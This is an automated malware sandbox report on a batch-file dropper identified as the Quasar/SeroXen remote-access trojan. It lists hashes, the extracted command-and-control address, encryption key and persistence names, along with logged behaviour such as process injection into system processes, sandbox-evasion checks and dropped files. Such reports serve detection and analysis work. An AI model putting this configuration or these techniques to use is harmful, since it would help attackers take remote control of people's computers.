Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2024 10:01
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20241007-en
General
-
Target
Uni.bat
-
Size
13.7MB
-
MD5
577c262de7ca8fdfef3b12e8dd170ca5
-
SHA1
dd35b98c86bd9ac07ee362aeb99a83714511bd6d
-
SHA256
5b50f8552e84e864a072b85c24a5aa8ceae9caf1f0ffec251e2240b43a26df2a
-
SHA512
83c1033a62520ce5b32eadf68bfe48421986e5a15eedeb9dcfdf8ba1d1bb99ca863e5313ed6a3fd3a9fb433869e64094388376d6a141016bfd6035d9367ce2ab
-
SSDEEP
49152:fYSZV75wgeIWwiXe0+DRcnymKneX5wmiiU5Xnh22OhqkNu7KTnyl3547ih563zBg:d
Malware Config
Extracted
quasar
1.4.0
v15.5.4 | SeroXen
86.20.153.176:1007
1e6be32f-7de8-4e84-abb4-edd31f5c9694
-
encryption_key
2C1A5E068ECB45220CA56F443A8C0F56408DD384
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
5
-
startup_key
$sxr-seroxen
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1520-58-0x0000023C45AC0000-0x0000023C4637E000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
Uni.bat.exe$sxr-powershell.exedescription pid process target process PID 2420 created 612 2420 Uni.bat.exe winlogon.exe PID 1520 created 612 1520 $sxr-powershell.exe winlogon.exe PID 1520 created 612 1520 $sxr-powershell.exe winlogon.exe PID 2420 created 612 2420 Uni.bat.exe winlogon.exe PID 2420 created 612 2420 Uni.bat.exe winlogon.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Uni.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Uni.bat.exe -
Deletes itself 1 IoCs
Processes:
Uni.bat.exepid process 2420 Uni.bat.exe -
Executes dropped EXE 12 IoCs
Processes:
Uni.bat.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exepid process 2420 Uni.bat.exe 1520 $sxr-powershell.exe 3008 $sxr-powershell.exe 1852 $sxr-powershell.exe 3568 $sxr-powershell.exe 5020 $sxr-powershell.exe 1172 $sxr-powershell.exe 2532 $sxr-powershell.exe 5076 $sxr-powershell.exe 4888 $sxr-powershell.exe 60 $sxr-powershell.exe 3932 $sxr-powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 11 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
Processes:
$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exepid process 1520 $sxr-powershell.exe 3568 $sxr-powershell.exe 5020 $sxr-powershell.exe 60 $sxr-powershell.exe 3932 $sxr-powershell.exe 4888 $sxr-powershell.exe 3008 $sxr-powershell.exe 1852 $sxr-powershell.exe 1172 $sxr-powershell.exe 2532 $sxr-powershell.exe 5076 $sxr-powershell.exe -
Drops file in System32 directory 17 IoCs
Processes:
svchost.exeOfficeClickToRun.exeUni.bat.exe$sxr-powershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\System32\vcruntime140d.dll Uni.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\System32\ucrtbased.dll Uni.bat.exe File created C:\Windows\System32\vcruntime140_1d.dll Uni.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll Uni.bat.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll Uni.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll Uni.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
Uni.bat.exe$sxr-powershell.exedescription pid process target process PID 2420 set thread context of 3936 2420 Uni.bat.exe dllhost.exe PID 1520 set thread context of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 set thread context of 4900 1520 $sxr-powershell.exe dllhost.exe PID 2420 set thread context of 5996 2420 Uni.bat.exe dllhost.exe PID 2420 set thread context of 1524 2420 Uni.bat.exe dllhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
Uni.bat.exedescription ioc process File created C:\Windows\$sxr-powershell.exe Uni.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Uni.bat.exe File created C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe Uni.bat.exe File created C:\Windows\$sxr-seroxen1\$sxr-Uni.bat Uni.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 5092 cmd.exe 5420 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 6108 taskkill.exe -
Modifies data under HKEY_USERS 14 IoCs
Processes:
OfficeClickToRun.exesvchost.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 24 Nov 2024 10:02:59 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={190ECAB3-FDB0-48D9-90A2-083C27695B48}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732442577" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Uni.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exedllhost.exepid process 2420 Uni.bat.exe 2420 Uni.bat.exe 2420 Uni.bat.exe 3936 dllhost.exe 3936 dllhost.exe 3936 dllhost.exe 3936 dllhost.exe 2420 Uni.bat.exe 2420 Uni.bat.exe 1520 $sxr-powershell.exe 1520 $sxr-powershell.exe 1520 $sxr-powershell.exe 4704 dllhost.exe 4704 dllhost.exe 4704 dllhost.exe 4704 dllhost.exe 1520 $sxr-powershell.exe 1520 $sxr-powershell.exe 3008 $sxr-powershell.exe 1852 $sxr-powershell.exe 3008 $sxr-powershell.exe 1852 $sxr-powershell.exe 3008 $sxr-powershell.exe 3008 $sxr-powershell.exe 1852 $sxr-powershell.exe 1852 $sxr-powershell.exe 3568 $sxr-powershell.exe 3568 $sxr-powershell.exe 3568 $sxr-powershell.exe 3568 $sxr-powershell.exe 5020 $sxr-powershell.exe 5020 $sxr-powershell.exe 5020 $sxr-powershell.exe 5020 $sxr-powershell.exe 1172 $sxr-powershell.exe 1172 $sxr-powershell.exe 1172 $sxr-powershell.exe 1172 $sxr-powershell.exe 2532 $sxr-powershell.exe 2532 $sxr-powershell.exe 2532 $sxr-powershell.exe 5076 $sxr-powershell.exe 5076 $sxr-powershell.exe 2532 $sxr-powershell.exe 2532 $sxr-powershell.exe 5076 $sxr-powershell.exe 5076 $sxr-powershell.exe 5076 $sxr-powershell.exe 4888 $sxr-powershell.exe 4888 $sxr-powershell.exe 4888 $sxr-powershell.exe 4888 $sxr-powershell.exe 4888 $sxr-powershell.exe 60 $sxr-powershell.exe 60 $sxr-powershell.exe 60 $sxr-powershell.exe 3932 $sxr-powershell.exe 3932 $sxr-powershell.exe 60 $sxr-powershell.exe 60 $sxr-powershell.exe 1520 $sxr-powershell.exe 1520 $sxr-powershell.exe 3932 $sxr-powershell.exe 4900 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exedllhost.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2420 Uni.bat.exe Token: SeDebugPrivilege 2420 Uni.bat.exe Token: SeDebugPrivilege 3936 dllhost.exe Token: SeDebugPrivilege 1520 $sxr-powershell.exe Token: SeDebugPrivilege 1520 $sxr-powershell.exe Token: SeDebugPrivilege 4704 dllhost.exe Token: SeDebugPrivilege 3008 $sxr-powershell.exe Token: SeDebugPrivilege 1852 $sxr-powershell.exe Token: SeDebugPrivilege 3568 $sxr-powershell.exe Token: SeDebugPrivilege 5020 $sxr-powershell.exe Token: SeDebugPrivilege 1172 $sxr-powershell.exe Token: SeDebugPrivilege 2532 $sxr-powershell.exe Token: SeDebugPrivilege 5076 $sxr-powershell.exe Token: SeDebugPrivilege 4888 $sxr-powershell.exe Token: SeDebugPrivilege 60 $sxr-powershell.exe Token: SeDebugPrivilege 3932 $sxr-powershell.exe Token: SeDebugPrivilege 1520 $sxr-powershell.exe Token: SeDebugPrivilege 4900 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAuditPrivilege 2732 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe Token: SeSystemEnvironmentPrivilege 2128 svchost.exe Token: SeUndockPrivilege 2128 svchost.exe Token: SeManageVolumePrivilege 2128 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2128 svchost.exe Token: SeIncreaseQuotaPrivilege 2128 svchost.exe Token: SeSecurityPrivilege 2128 svchost.exe Token: SeTakeOwnershipPrivilege 2128 svchost.exe Token: SeLoadDriverPrivilege 2128 svchost.exe Token: SeSystemtimePrivilege 2128 svchost.exe Token: SeBackupPrivilege 2128 svchost.exe Token: SeRestorePrivilege 2128 svchost.exe Token: SeShutdownPrivilege 2128 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$sxr-powershell.exeConhost.exepid process 1520 $sxr-powershell.exe 2368 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exeUni.bat.exe$sxr-powershell.exedllhost.exedescription pid process target process PID 2352 wrote to memory of 2420 2352 cmd.exe Uni.bat.exe PID 2352 wrote to memory of 2420 2352 cmd.exe Uni.bat.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 3936 2420 Uni.bat.exe dllhost.exe PID 2420 wrote to memory of 1520 2420 Uni.bat.exe $sxr-powershell.exe PID 2420 wrote to memory of 1520 2420 Uni.bat.exe $sxr-powershell.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4704 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 3008 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 3008 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 1852 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 1852 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 3568 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 3568 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 5020 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 5020 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 1172 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 1172 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 2532 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 2532 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 5076 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 5076 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 4888 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 4888 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 60 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 60 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 3932 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 3932 1520 $sxr-powershell.exe $sxr-powershell.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 1520 wrote to memory of 4900 1520 $sxr-powershell.exe dllhost.exe PID 4900 wrote to memory of 612 4900 dllhost.exe winlogon.exe PID 4900 wrote to memory of 668 4900 dllhost.exe lsass.exe PID 4900 wrote to memory of 956 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 316 4900 dllhost.exe dwm.exe PID 4900 wrote to memory of 508 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 952 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1064 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1084 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1176 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1208 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1244 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1316 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1380 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1388 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1400 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1420 4900 dllhost.exe svchost.exe PID 4900 wrote to memory of 1580 4900 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e427e55e-db3b-45e0-a970-dae67332a6e6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d41c35f3-63d7-4245-a09c-3516c578a7c9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{808f74f0-b5a5-41ba-8198-1d1a6bb514e7}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4900
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6b9b4e50-f466-494f-9a70-a6ee2cd84949}2⤵PID:5996
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{617c83cb-5271-453c-8b02-0015685bb9ba}2⤵PID:1524
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1176
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2912
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1380
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1420
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2652
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1756
-
